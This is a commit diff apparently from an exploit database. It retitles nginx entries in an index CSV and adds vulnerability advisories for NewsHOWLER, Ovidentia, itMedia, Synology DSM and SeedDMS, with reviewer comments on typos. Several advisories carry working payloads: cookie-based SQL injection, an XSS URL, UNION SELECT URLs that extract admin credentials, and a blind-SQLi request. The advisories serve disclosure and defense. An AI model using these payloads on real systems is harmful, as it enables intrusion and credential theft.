
Commit 57f2303

author
Offensive Security
committed
Updated 03_16_2014
1 parent 97f8c52 commit 57f2303

File tree

6 files changed

+172
-9
lines changed


files.csv

Lines changed: 14 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -9218,7 +9218,7 @@ id,file,description,date,author,platform,type,port
92189218
9826,platforms/php/webapps/9826.txt,"MindSculpt CMS SQL Injection",2009-09-24,kaMitEz,php,webapps,0
92199219
9827,platforms/multiple/webapps/9827.py,"html2ps 1.0 beta5 file disclosure",2009-09-24,epiphant,multiple,webapps,0
92209220
9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection and xss",2009-09-23,"Alexey Sintsov",php,webapps,0
9221-
9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 WebDAV directory traversal",2009-09-23,kingcope,multiple,remote,80
9221+
9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80
92229222
9830,platforms/php/webapps/9830.txt,"Cour Supreme SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0
92239223
9831,platforms/windows/local/9831.txt,"Avast Antivirus 4.8.1351.0 DoS and Privilege Escalation",2009-09-23,Evilcry,windows,local,0
92249224
9832,platforms/php/webapps/9832.txt,"Joomla/Mambo Tupinambis SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
@@ -9282,7 +9282,7 @@ id,file,description,date,author,platform,type,port
92829282
9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0
92839283
9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
92849284
9900,platforms/windows/remote/9900.txt,"NaviCOPA <= 3.0.1.2 Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0
9285-
9901,platforms/linux/dos/9901.txt,"nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC",2009-10-23,"Zeus Penguin",linux,dos,80
9285+
9901,platforms/linux/dos/9901.txt,"nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 - PoC",2009-10-23,"Zeus Penguin",linux,dos,80
92869286
9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80
92879287
9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 xss, SQL injection",2009-10-20,"Amol Naik",php,webapps,0
92889288
9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection Vulnerability",2009-10-30,"Securitylab Research",asp,webapps,0
@@ -11650,7 +11650,7 @@ id,file,description,date,author,platform,type,port
1165011650
12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection Vulnerability",2010-05-29,kannibal615,php,webapps,0
1165111651
12801,platforms/php/webapps/12801.txt,"Oscommerce Online Merchant 2.2 - File Disclosure And Admin ByPass",2010-05-30,Flyff666,php,webapps,0
1165211652
12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0
11653-
12804,platforms/multiple/remote/12804.txt,"nginx [engine x] http server <= 0.6.36 Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0
11653+
12804,platforms/multiple/remote/12804.txt,"nginx [engine x] http server <= 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0
1165411654
12805,platforms/php/webapps/12805.txt,"Zeeways Script Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
1165511655
12806,platforms/php/webapps/12806.txt,"CMScout (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
1165611656
12807,platforms/php/webapps/12807.txt,"Creato Script SQL Injection Vulnerability",2010-05-30,Mr.P3rfekT,php,webapps,0
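Review bot: the 12804 line keeps the typo "Path Draversal" in both the removed and the added version of the description; since the line is being rewritten anyway to insert the " - " separator, correct it to "Path Traversal" so that searches on the traversal category find this nginx entry.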
@@ -12134,10 +12134,10 @@ id,file,description,date,author,platform,type,port
1213412134
13815,platforms/asp/webapps/13815.pl,"Netvolution CMS <= 2.x SQL Injection Exploit Script",2010-06-10,"amquen and krumel",asp,webapps,0
1213512135
13816,platforms/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform SQL Injection",2010-06-10,"L0rd CrusAd3r",php,webapps,0
1213612136
13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability",2010-06-11,LiquidWorm,windows,dos,0
12137-
13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities",2010-06-11,Dr_IDE,windows,remote,0
12137+
13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure and DoS Vulnerabilities",2010-06-11,Dr_IDE,windows,remote,0
1213812138
13819,platforms/php/webapps/13819.txt,"E-PHP B2B Marketplace Multiple Vulns",2010-06-11,MizoZ,php,webapps,0
1213912139
13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0
12140-
13822,platforms/windows/remote/13822.txt,"Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability",2010-06-11,"Jose A. Vazquez",windows,remote,0
12140+
13822,platforms/windows/remote/13822.txt,"Nginx <= 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download Vulnerability",2010-06-11,"Jose A. Vazquez",windows,remote,0
1214112141
13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents (Mobile Office Suite) XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0
1214212142
13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0
1214312143
13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0
@@ -22091,7 +22091,7 @@ id,file,description,date,author,platform,type,port
2209122091
24964,platforms/windows/webapps/24964.txt,"Oracle WebCenter Sites Satellite Server - HTTP Header Injection",2013-04-18,"SEC Consult",windows,webapps,0
2209222092
24965,platforms/php/webapps/24965.txt,"KrisonAV CMS 3.0.1 - Multiple Vulnerabilities",2013-04-18,"High-Tech Bridge SA",php,webapps,0
2209322093
24966,platforms/windows/dos/24966.txt,"Java Web Start Launcher ActiveX Control - Memory Corruption",2013-04-18,"SEC Consult",windows,dos,0
22094-
24967,platforms/multiple/webapps/24967.txt,"nginx 0.6.x Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0
22094+
24967,platforms/multiple/webapps/24967.txt,"nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0
2209522095
24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service",2013-04-22,xis_one,windows,dos,514
2209622096
24969,platforms/php/webapps/24969.txt,"CiviCRM for Joomla 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0
2209722097
24972,platforms/windows/dos/24972.c,"Flightgear 2.0, 2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0
@@ -22613,7 +22613,7 @@ id,file,description,date,author,platform,type,port
2261322613
25496,platforms/php/webapps/25496.txt,"php-Charts 1.0 - Code Execution Vulnerability",2013-05-17,"fizzle stick",php,webapps,0
2261422614
25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 Reverse TCP Bind Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
2261522615
25498,platforms/asp/webapps/25498.txt,"ASPNuke 0.80 Comments.ASP SQL Injection Vulnerability",2005-04-22,Dcrab,asp,webapps,0
22616-
25499,platforms/linux/dos/25499.py,"nginx 1.3.9-1.4.0 DoS PoC",2013-05-17,"Mert SARICA",linux,dos,0
22616+
25499,platforms/linux/dos/25499.py,"nginx 1.3.9-1.4.0 - DoS PoC",2013-05-17,"Mert SARICA",linux,dos,0
2261722617
25500,platforms/asp/webapps/25500.txt,"ASPNuke 0.80 Detail.ASP SQL Injection Vulnerability",2005-04-22,Dcrab,asp,webapps,0
2261822618
25501,platforms/asp/webapps/25501.txt,"ASPNuke 0.80 Profile.ASP Cross-Site Scripting Vulnerability",2005-04-22,Dcrab,asp,webapps,0
2261922619
25502,platforms/asp/webapps/25502.txt,"ASPNuke 0.80 Select.ASP Cross-Site Scripting Vulnerability",2005-04-22,Dcrab,asp,webapps,0
@@ -22883,7 +22883,7 @@ id,file,description,date,author,platform,type,port
2288322883
25772,platforms/php/webapps/25772.txt,"Qualiteam X-Cart 4.0.8 register.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
2288422884
25773,platforms/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 search.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
2288522885
25774,platforms/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 giftcert.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
22886-
25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80
22886+
25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80
2288722887
25776,platforms/windows/local/25776.rb,"AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-28,metasploit,windows,local,0
2288822888
25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 IncDir Remote File Include Vulnerability",2005-05-31,"SoulBlack Group",php,webapps,0
2288922889
25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0
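Review bot: "Chuncked Encoding" on the 25775 line is a typo carried over from the old description into the new one; while the line is being edited, make it "Chunked Encoding Stack Buffer Overflow" so the entry is found alongside the other nginx 1.3.9-1.4.0 entries (25499, 26737) when searching the CSV.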
@@ -23819,7 +23819,7 @@ id,file,description,date,author,platform,type,port
2381923819
26734,platforms/php/webapps/26734.txt,"vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability",2013-07-10,[]0iZy5,php,webapps,0
2382023820
26735,platforms/php/webapps/26735.txt,"vBulletin vBShout Mod - Stored XSS Vulnerability",2013-07-10,[]0iZy5,php,webapps,0
2382123821
26736,platforms/hardware/webapps/26736.txt,"Zoom X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",hardware,webapps,0
23822-
26737,platforms/linux/remote/26737.pl,"nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0
23822+
26737,platforms/linux/remote/26737.pl,"nginx 1.3.9/1.4.0 x86 - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0
2382323823
26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80
2382423824
26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x Email Attachments HTML Injection Vulnerability",2005-12-06,"SEC Consult",linux,remote,0
2382523825
26742,platforms/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 Password.ASP Cross-Site Scripting Vulnerability",2005-12-06,Dj_Eyes,asp,webapps,0
@@ -29046,3 +29046,8 @@ id,file,description,date,author,platform,type,port
2904629046
32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/loginbox.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
2904729047
32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/whos_online.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
2904829048
32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 templates/Freeway/mainpage_modules/mainpage.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
29049+
32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 Cookie Data SQL Injection Vulnerability",2008-08-18,IRCRASH,php,webapps,0
29050+
32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 'index.php' Cross-Site Scripting Vulnerability",2008-08-18,"ThE dE@Th",php,webapps,0
29051+
32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 (article.php) - Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80
29052+
32275,platforms/php/webapps/32275.txt,"itMedia Multiple SQL Injection Vulnerabilities",2008-08-18,baltazar,php,webapps,0
29053+
32276,platforms/php/webapps/32276.txt,"SeedDMS 4.3.3 - Multiple Vulnerabilities",2014-03-14,"Craig Arendt",php,webapps,80
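Review bot: the new 32274 line describes the affected version as "4.3-3827", whereas the advisory added in platforms/php/webapps/32274.txt states "Version affected: <= 4.3-3827"; use "<= 4.3-3827" in the description so the CSV does not understate the affected range. The five added lines also mix port values: 32274 and 32276 use 80 while the other three webapps entries use 0; pick one convention for the batch.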

platforms/php/webapps/32271.txt

Lines changed: 8 additions & 0 deletions
@@ -0,0 +1,8 @@
1+
source: http://www.securityfocus.com/bid/30732/info
2+
3+
NewsHOWLER is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";
8+
javascript:document.cookie = "news_password=3; path=/";
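Review bot: the new file names no affected version, although the CSV line for it says "NewsHOWLER 1.03"; add a line such as "NewsHOWLER 1.03 is vulnerable; other versions may also be affected." (as 32272.txt does) so the advisory is self-describing. A short sentence stating that the injection point is the news_user cookie value would also make the affected parameter explicit for anyone writing a detection rule from this entry.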

platforms/php/webapps/32272.txt

Lines changed: 9 additions & 0 deletions
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/30735/info
2+
3+
Ovidentia is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
6+
7+
Ovidentia 6.6.5 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/[path]/index.php?tg=search&pat=abcdefgh&idx=find&navpos=0&navitem=&field=<script>alert(333.45)</script>

platforms/php/webapps/32274.txt

Lines changed: 54 additions & 0 deletions
@@ -0,0 +1,54 @@
1+
~~~~~~
2+
Title: Synology DSM Blind SQL Injection
3+
Version affected: <= 4.3-3827
4+
Vendor: Synology
5+
Discovered by: Michael Wisniewski
6+
Status: Patched
7+
~~~~~~
8+
9+
The file "/photo/include/blog/article.php" contains a Blind SQL
10+
Injection Vulnerability in the 'value' variable in the URL.
11+
12+
The vendor was contacted approximately 2 weeks ago. They reviewed the
13+
information and determined that it is vulnerable and a patch has been
14+
released. The DSM5 official release contains this patch, which was
15+
released earlier this week. An update for DSM4.x will be released
16+
later this month to address this issue in the 4.x line. The vendor
17+
also stated that it will be fixed in the next Photo Station hotfix for
18+
the 4.x line.
19+
20+
Work-around: If you don't use the blog, just rename the file.
21+
22+
~~~~~~
23+
POST /photo/include/blog/article.php HTTP/1.1
24+
Content-Length: 59
25+
Content-Type: application/x-www-form-urlencoded
26+
X-Requested-With: XMLHttpRequest
27+
Referer: <ip>:80/ <http://10.0.1.15:80/>
28+
Cookie: PHPSESSID=<foo>; visit_day=<foo>
29+
Host: <foo>
30+
Connection: Keep-alive
31+
Accept-Encoding: gzip,deflate
32+
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
33+
like Gecko) Chrome/28.0.1500.63 Safari/537.36
34+
Accept: */*
35+
36+
list_type=label&value=1%20AND%203*2*1%3d6%20AND%20812%3d812
37+
~~~~~~
38+
39+
It responds with:
40+
41+
All posts without a label
42+
Synology Blog
43+
2008-01-01 00:00:00 Published by:Synology Blog
44+
45+
~~~~~~
46+
47+
Timeline:
48+
- 3/1/14: Contacted Vendor with Details of Vulnerability and Exploit.
49+
- 3/2/14: Vendor responded with 'they are investigating'.
50+
- 3/4/14: Vendor responded with it being fixed in DSM5 and DSM4.x (4.x
51+
patched later in the month)
52+
- 3/10/14: DSM5 Released
53+
- 3/10/14: Contacted Vendor Final Time to make sure it's OK to release the
54+
information.
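Review bot: the Referer header in the request sample keeps a real-looking address, "<http://10.0.1.15:80/>", next to the "<ip>" placeholder, while every other identifying field is masked as <foo>; replace it with the same placeholder. The User-Agent value on the lines marked 32+ and 33+ is also wrapped across two lines ("(KHTML," / "like Gecko) ..."), which is not a valid header as pasted; join it onto one line so the sample parses as HTTP.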

platforms/php/webapps/32275.txt

Lines changed: 21 additions & 0 deletions
@@ -0,0 +1,21 @@
1+
source: http://www.securityfocus.com/bid/30740/info
2+
3+
itMedia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
http://www.example.com/vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass),3,4,5,6,7+from+admin--
8+
9+
http://www.example.com/vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass)+from+admin--
10+
11+
http://www.example.com/vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5,6,7,8,9,10+from+admin--
12+
13+
http://www.example.com/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass)+from+admin--
14+
15+
http://www.example.com/galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass),4,5+from+admin--
16+
17+
http://www.example.com/ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass),3+from+admin--
18+
19+
http://www.example.com/ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4+from+admin--
20+
21+
http://www.example.com/slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass),4,5+from+admin--

platforms/php/webapps/32276.txt

Lines changed: 66 additions & 0 deletions
@@ -0,0 +1,66 @@
1+
Product description:
2+
============
3+
SeedDMS is the continuation of LetoDMS because it has lost its main developer. SeedDMS is an easy to use but powerful Open Source Document Management System.
4+
http://www.seeddms.org/index.php?id=2
5+
============
6+
7+
SeedDMS Unprivileged User Remote Code Execution Vulnerability (CVE-2014-2278):
8+
============
9+
Missing Function Level Access Controls: The application will allow file uploads of any type without sufficient user access controls.
10+
11+
Any unprivileged user, including guest users can upload arbitrary file types, including script formats that will allow remote code execution on the server.
12+
13+
Details:
14+
----------------------
15+
The /op/op.AddFile2.php upload function is not sufficiently access controlled. The script path can be controlled using the "fileId" parameter, which will allow an attacker to control the location of files to be uploaded to the system. Using path traversal a user can traverse out of the configured upload path, and insert arbitrary files into the web root.
16+
17+
The ?partitionIndex? parameter is used for filename/extension specification in the path.
18+
19+
The CVE project assigned CVE-2014-2278 to this issue.
20+
============
21+
22+
SeedDMS Path Traversal Vulnerability (CVE-2014-2279):
23+
============
24+
A user can use path traversal methods to return the contents of local files.
25+
26+
To exploit this vulnerability requires privileged access to the LogManagement application functionality.
27+
28+
Details:
29+
----------------------
30+
The /out/out.LogManagement.php script will allow local files to be retrieved from the server by path traversal using the "logname" parameter.
31+
32+
The CVE project assigned CVE-2014-2279 to this issue.
33+
============
34+
35+
SeedDMS Cross-site Scripting Vulnerability (CVE-2014-2280)
36+
============
37+
The application search feature is vulnerable to reflected cross-site scripting attacks.
38+
39+
Details:
40+
----------------------
41+
The "query" parameter will accept scripting tags, which will be returned to the page without validation, or sanitization of HTML entities.
42+
43+
The CVE project assigned CVE-2014-2280 to this issue.
44+
============
45+
46+
Vendor Response:
47+
Upgrade to SeedDMS 4.3.4 or higher.
48+
https://sourceforge.net/projects/seeddms/files/seeddms-4.3.4/
49+
50+
Timeline:
51+
============
52+
February 26, 2014, Vulnerability identified
53+
February 26, 2014, Product vendor notification
54+
February 26, 2014, Product vendor patch review
55+
February 27, 2014, Product vendor fix confirmed
56+
February 28, 2014, Patch released
57+
March 14, 2014, 2014, Disclosure
58+
59+
Research:
60+
============
61+
Craig Arendt, Stratum Security
62+
http://www.stratumsecurity.com
63+
64+
Disclaimer:
65+
----------------------
66+
The information provided in this advisory is provided as is without warranty of any kind.
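Review bot: on the line marked 17+ the parameter name is rendered as ?partitionIndex? (smart quotes lost in encoding); write "partitionIndex" in straight quotes, as "fileId", "logname" and "query" are elsewhere in the file. The timeline entry "March 14, 2014, 2014, Disclosure" repeats the year, and the product description sentence "SeedDMS is the continuation of LetoDMS because it has lost its main developer" reads better as "SeedDMS is the continuation of LetoDMS, which lost its main developer."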
